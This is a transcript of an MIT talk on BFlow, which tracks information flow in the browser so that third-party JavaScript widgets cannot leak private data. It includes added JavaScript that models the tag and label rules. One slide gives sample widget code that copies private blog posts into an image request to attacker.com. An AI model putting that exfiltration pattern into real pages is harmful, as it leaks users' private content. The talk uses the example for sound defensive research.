Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology.

Presentation transcript:

Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology

Web Sites Support 3rd Party JavaScript Extensions
- Snippets of the last few blog posts
- Display the last few reader comments
- Blogger.com supports "widgets" – read and modify blog posts

Confidential Blogs Are Vulnerable to 3rd Party JavaScript

A 3rd Party JavaScript Leak Attack
- Blogger.com wants to provide data to widgets, so the widget has access to private blog content
- Browser security policy permits JS to send data freely, so the widget leaks private blog content to attacker.com
Widget's JavaScript source code (the image tag's HTML was dropped from the transcript; it is reconstructed here from the request shown on the slide):
  private_data = document.getElementById("posts").innerHTML;
  widget.innerHTML = private_data;
  widget.innerHTML += '<img src="http://attacker.com/sell_pet_food_online.gif">';
Resulting HTTP request from Alice's browser (running Blogger JS + attacker JS) to the attacker.com server; the private post text is carried as the requested file name:
  GET /sell_pet_food_online.gif HTTP/1.0
- Wrote a malicious blogger.com widget in one hour: it shows private blog content in the widget's box

Problem: Extensibility vs. Privacy
(figure: two mock mail extensions, "Dan's Spell Checker" with a Check Spelling button over the mail body, and "Joe's Encryption Widget" with Encrypt Mail / Decrypt Mail buttons)
Choose one:
- Either choose cool extensibility features – e.g. Blogger.com widgets
- Or choose privacy and no 3rd party code – e.g. Gmail

Solution: BFlow
- Eliminate the choice between features & privacy
- Add information flow control (IFC)
  – To JavaScript in the browser
  – Track private data inside the browser and server
- Prohibit communication that leaks private data

Challenges
- Fit JavaScript environment into an IFC model
  – Preserve JavaScript communication channels (send to top-level frame, send to sub-frame)
  – Mashups with private data (figure: a private address sent to the Google Maps server)
- Easy to adopt
  – Minimize changes to JS that uses existing communication channels
  – Minimize changes required on the server
  – Easy for end-users to start using

Contributions
- An IFC model for the JS runtime environment
- Easy to deploy and adopt implementation
  – Installs in browser with 2 clicks
  – Requires no changes to JavaScript interpreter; only small changes to JavaScript communication API
- A platform that supports real blogger.com widgets

BFlow Overview
(figure: a browser containing a reference monitor, one trusted protection zone and several untrusted protection zones, talking to a blog web server and an attacker.com server)
- Blog server supplies some HTML/JS and "labels" private data with a "tag"
- 3rd party supplies widget HTML/JS
- Reference monitor knows when a zone reads private data: that zone's label becomes "saw Alice's private data"

BFlow Overview (continued)
- Have not seen private data: can send requests to any server
- Have seen private data: can only send requests to the data's server
- Declassification: fetching a map image from the Google Maps server is OK
- BFlow prevents the malicious widget from leaking private data to the attacker.com server

Design Outline
- Tags and Labels
- Protection Zones
- Reference Monitor
- Server

Tags And Labels
- Each tag identifies a kind of private data
  – Alice's tag: blogger.com:alice
  – Bob's tag: blogger.com:bob
- A label is a set of tags
  – Describes what private data an object contains
  – Each zone, HTTP request, and response has a label
- e.g. Alice's blog has label L = {blogger.com:alice}

Data Flow Rule
- Data may flow from an object to a receiver (e.g. a piece of JavaScript) only if L_data ⊆ L_receiver
  Data Label | Receiver Label | May Receive?
  {x}        | {x, y}         | Yes
  {x}        | {}             | No

Protection Zones
- A zone is a group of browser HTML
  – Regular JavaScript runs inside a frame inside a zone
  – All frames in a zone share the same label
- Trusted zone
  – Top-level frame is in the site's trusted zone
  – Contains JavaScript written only by the site's developers
  – Need not abide by information flow restrictions
- Untrusted zones
  – Contain 3rd party JavaScript
  – Must abide by information flow restrictions

Example Zones & Labels
(figure: a page whose top-level frame is in the Trusted Zone (no label) and which contains four untrusted zones)
- Zone A: L = {}
- Zone B: L = {blogger.com:alice}
- Zone C: L = {}
- Zone D: L = {blogger.com:alice}

How Do Untrusted Zones Get Labels?
(figure: the blog web server serves the page; inside the browser, the trusted zone calls the reference monitor)
- The trusted zone sets an untrusted zone's label through the browser reference monitor: augment_label(blogger.com:alice) takes a zone from L = {} to L = {blogger.com:alice}

Works With Existing JS Channels
(figure: a web page from X.com whose top-level frame contains Frame 1 with L = {X.com:A}, which in turn contains Frame 2 with L = {X.com:A, X.com:B})
- Channel 1: A frame can always send to its child frame
  – Therefore L_parent ⊆ L_child
  – Frame 1 may not add X.com:C to its label (Frame 2's label would no longer contain Frame 1's)
- Channel 2: A frame can always send to the top-level frame
  – To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame
  – No sub-frame from X.com may add a tag from Y.com

Why Zones Instead Of Frames?
- Some JavaScript consists of multiple frames, e.g. the Cbox chat widget: its bottom frame writes messages to its top frame
- Group JavaScript into modules by label
  – All frames in the same zone can always communicate
  – Trusted JavaScript sets the label of a multi-frame widget only once
  – Existing multi-frame widgets need not coordinate label changes

BFlow's JavaScript Model
- All JavaScript will work if the IFC rules allow – AJAX, eval()
- The IFC rule (L_data ⊆ L_receiver) affects
  – access to DOM variables & cookies
  – postMessage(), fragment-ID messages
  – HTTP requests and responses

HTTP Request Rules
- Trusted zone T
  – can send to any server (always)
  – can receive a response from any server (always)
- Untrusted zone Z
  – can send to the server where its secret data came from (always), and can receive the response when L_response ⊆ L_Z
  – can send to a 3rd party server E when L_Z = {}, or when the web site has a declassification exception for (server E, URL), and can receive that response (always)
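The tag/label rule, the two inherent frame channels and the HTTP request rules of the preceding slides, as an added example that is not code from the BFlow paper or its Firefox extension. Tag syntax "site:principal" (e.g. blogger.com:alice) follows the slides; the function names, the zone record, the assumption that a tag's data is owned by the server named in its site part, and the shape of the declassification-exception table are this example's own.

```javascript
// Added example, not code from the BFlow paper or its Firefox extension: a small model of
// BFlow's tags and labels, zones, label augmentation and the HTTP request rules, so the
// subset rule can be exercised. Tag syntax "site:principal" (e.g. "blogger.com:alice")
// follows the slides; the function names, the zone record and the shape of the
// declassification-exception table are this example's own assumptions.

// A label is a set of tags. Data Flow Rule: data may flow only if L_data ⊆ L_receiver.
function subset(a, b) {
  for (const t of a) if (!b.has(t)) return false;
  return true;
}
function mayFlow(Ldata, Lreceiver) {
  return subset(Ldata, Lreceiver);
}
function tagSite(tag) {
  return tag.slice(0, tag.indexOf(":"));
}

// A zone is a group of frames sharing one label. The trusted zone (the site's own JS in
// the top-level frame) carries no label and is exempt; untrusted zones (3rd-party JS)
// carry a label and sit under a parent zone.
function makeZone(name, { trusted = false, parent = null } = {}) {
  const zone = { name, trusted, parent, label: new Set(), children: [] };
  if (parent) parent.children.push(zone);
  return zone;
}

// Trusted JS labels an untrusted zone (augment_label on the slides). Two constraints
// come from the existing JS channels: a tag must belong to the top-level site, because
// any frame can send to the top-level frame; and a parent may only add a tag its child
// zones already hold, because a frame can always send to its child (L_parent ⊆ L_child).
function augmentLabel(topSite, zone, tag) {
  if (zone.trusted) throw new Error("the trusted zone carries no label");
  if (tagSite(tag) !== topSite) return false;
  if (!zone.children.every(child => child.label.has(tag))) return false;
  zone.label.add(tag);
  return true;
}

// HTTP Request Rules. The server that owns a tag's data is taken to be the tag's site
// part (assumption; the slides say "the server where secret data came from").
function maySendRequest(zone, server, url, exceptions = []) {
  if (zone.trusted) return true;                // trusted zone: any server, always
  if (zone.label.size === 0) return true;       // has not seen private data: any server
  const allOwnedByServer = [...zone.label].every(t => tagSite(t) === server);
  if (allOwnedByServer) return true;            // the data's own server: always
  // any other server: only through a declassification exception for (server, URL)
  return exceptions.some(e => e.server === server && e.url === url);
}

// The trusted zone receives any response; an untrusted zone Z only when
// L_response ⊆ L_Z. A 3rd-party server speaks plain HTTP and attaches no label,
// so for it this reduces to the slides' "always".
function mayReceiveResponse(zone, responseLabel) {
  return zone.trusted || subset(responseLabel, zone.label);
}

// The leak attack from the slides, run through the model: the widget zone starts with an
// empty label, then reads Alice's posts, then tries to reach attacker.com.
function leakAttackScenario() {
  const top = makeZone("blogger.com trusted", { trusted: true });
  const widget = makeZone("widget", { parent: top });
  const beforeRead = maySendRequest(widget, "attacker.com", "/sell_pet_food_online.gif");
  augmentLabel("blogger.com", widget, "blogger.com:alice");   // widget reads private data
  const afterRead = maySendRequest(widget, "attacker.com", "/sell_pet_food_online.gif");
  const toBlogger = maySendRequest(widget, "blogger.com", "/save_post");
  const toMaps = maySendRequest(widget, "maps.google.com", "/staticmap",
    [{ server: "maps.google.com", url: "/staticmap" }]);   // declassification exception (assumed)
  return { beforeRead, afterRead, toBlogger, toMaps };
}
```

Note the ordering augmentLabel forces: because L_parent ⊆ L_child must hold, a parent zone can only take on a tag after its child zones already carry it, which is why the slide's Frame 1 ({X.com:A}) may not add X.com:C while Frame 2 ({X.com:A, X.com:B}) may. The same-origin isolation between zones is not modelled; the monitor here only decides what may leave the browser.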

The BFlow Server API
- Propagate label from HTTP requests to responses
  – Read label contained in each request
  – Attach the label to any response that uses labeled data
(figure: Zone A with L = {blogger.com:alice} sends the blog web server a labeled request; Zone B with L = {blogger.com:alice} receives the labeled response)
  HTTP Request: POST save_post?content=sell_petfood_online
    Label: L = {blogger.com:alice}
  HTTP Response Contents: sell_petfood_online
    Label: L = {blogger.com:alice}
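The server-side rule above (read the request label, attach a label to any response built from labeled data) together with the browser-side delivery check, as an added example that is not the BFlow server code. Requests and responses are plain objects carrying a label Set; the in-memory post store, the /read_posts path and the body shapes are this example's own assumptions, since the slide shows only save_post and one labeled response.

```javascript
// Added example, not the BFlow server code: a model of the BFlow Server API rule
// "propagate label from HTTP requests to responses", plus the browser-side delivery
// check it relies on. Requests and responses are plain objects carrying a `label` Set;
// the in-memory post store, the /read_posts path and the body shapes are this
// example's own assumptions (the slides show only save_post and a labeled response).

function subset(a, b) {
  for (const t of a) if (!b.has(t)) return false;
  return true;
}
function union(labels) {
  const out = new Set();
  for (const l of labels) for (const t of l) out.add(t);
  return out;
}

function createBlogServer() {
  const posts = [];   // each entry: { content, label }

  function handle(req) {
    if (req.path === "/save_post") {
      // Read the label contained in the request and store the data under it.
      const id = posts.push({ content: req.body.content, label: new Set(req.label) }) - 1;
      return { status: 200, body: { id }, label: new Set(req.label) };
    }
    if (req.path === "/read_posts") {
      // Attach to the response the union of the labels of every post it uses, so a
      // page that mixes Alice's and Bob's posts is labeled with both tags.
      const used = req.body.ids.map(i => posts[i]);
      return {
        status: 200,
        body: { contents: used.map(p => p.content) },
        label: union(used.map(p => p.label)),
      };
    }
    return { status: 404, body: null, label: new Set() };
  }
  return { handle };
}

// Browser side: the reference monitor hands a response to untrusted zone Z only when
// L_response ⊆ L_Z; otherwise the zone sees nothing.
function deliver(zoneLabel, res) {
  return subset(res.label, zoneLabel) ? res.body : null;
}

// Alice's widget zone (label {blogger.com:alice}) saves a post, reads it back, and then
// asks for a page that also uses Bob's post. The first read arrives; the second is blocked.
function scenario() {
  const server = createBlogServer();
  const alice = new Set(["blogger.com:alice"]);
  const bob = new Set(["blogger.com:bob"]);
  server.handle({ path: "/save_post", label: alice, body: { content: "sell_petfood_online" } });
  server.handle({ path: "/save_post", label: bob, body: { content: "bob's draft" } });

  const widgetLabel = alice;
  const own = server.handle({ path: "/read_posts", label: widgetLabel, body: { ids: [0] } });
  const mixed = server.handle({ path: "/read_posts", label: widgetLabel, body: { ids: [0, 1] } });
  return {
    ownDelivered: deliver(widgetLabel, own),        // { contents: ["sell_petfood_online"] }
    mixedDelivered: deliver(widgetLabel, mixed),    // null: {alice, bob} ⊄ {alice}
    mixedLabel: [...mixed.label].sort(),            // both tags
  };
}
```

The server never decides who may see what; it only labels honestly, and the reference monitor in the browser applies L_response ⊆ L_Z. A server that forgot to union in a label it used (for instance Bob's tag when rendering a combined page) would be the weak point of this design, which is why the slide phrases the API as a propagation obligation on every response that touches labeled data.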

BFlow Implementation
- Browser reference monitor is a Firefox extension, 1100 lines of code
- Users can install with 2 clicks
- JavaScript communication API changed slightly
- No changes to JavaScript interpreter

Zone Isolation
- Repurpose browser's same-origin policy (SOP): each zone gets its own domain name, e.g. Zone1.blogger and Zone2.blogger
  – Zones communicate via reference monitor; no direct communication
  – SOP is conservative: no DOM read/write across zones even if labels would allow

Applications
- BF-Socialnet
  – Social network that supports 3rd party JS extensions
  – Protects private user data (see paper)
- BFlogger
  – Blog mockup that supports blogger.com widgets
  – Ported 12 existing widgets to BFlogger

BFlow Preserves Privacy
- Wrote a malicious Blogger.com widget
  – Successfully leaks data from confidential blogs
- Ported widget to BFlogger
  – BFlow prevents the malicious widget from leaking data: no requests to the attacker.com server after reading private data

BFlow Runs Existing JavaScript
  Widget        | Lines of Code | Lines Changed | Uses Secret Data?
  Twitter       | 25            | 0             | No
  Flickr        | 10            | 0             | No
  Buzz          | 1             | 0             | No
  Youtube       | 1982          | 0             | No
  Calendar      | 1945          | 0             | No
  Weather       | 3790          | 0             | No
  Popular Posts | 16            | 1             | Yes
  Commenters    | 15            | 1             | Yes
  Recent Posts  | 74            | 2             | Yes
  Random Post   | 34            | 2             | Yes
  Cbox-chat     | 801           | 89            | Yes
- Cbox-chat's count is high because we made Chat store data on the BFlow server to protect chat data
- Better privacy with little or no changes

Existing Research
- Can't grant read access without also leaking [MashupOS]
- Requires rewriting JavaScript & manual jail config [Caja]
- Don't support untrusted JavaScript [Swift, SIF]
- User must make disclosure decisions [NoMoXSS]
- Certificates [Java]

Conclusion
- 3rd party JavaScript can leak confidential user data
- BFlow provides a new web security model
  – Tracks information flow between client & server
  – 3rd party JavaScript can safely compute and display
  – Enables new features in web sites, e.g. 3rd party Gmail extensions
Questions?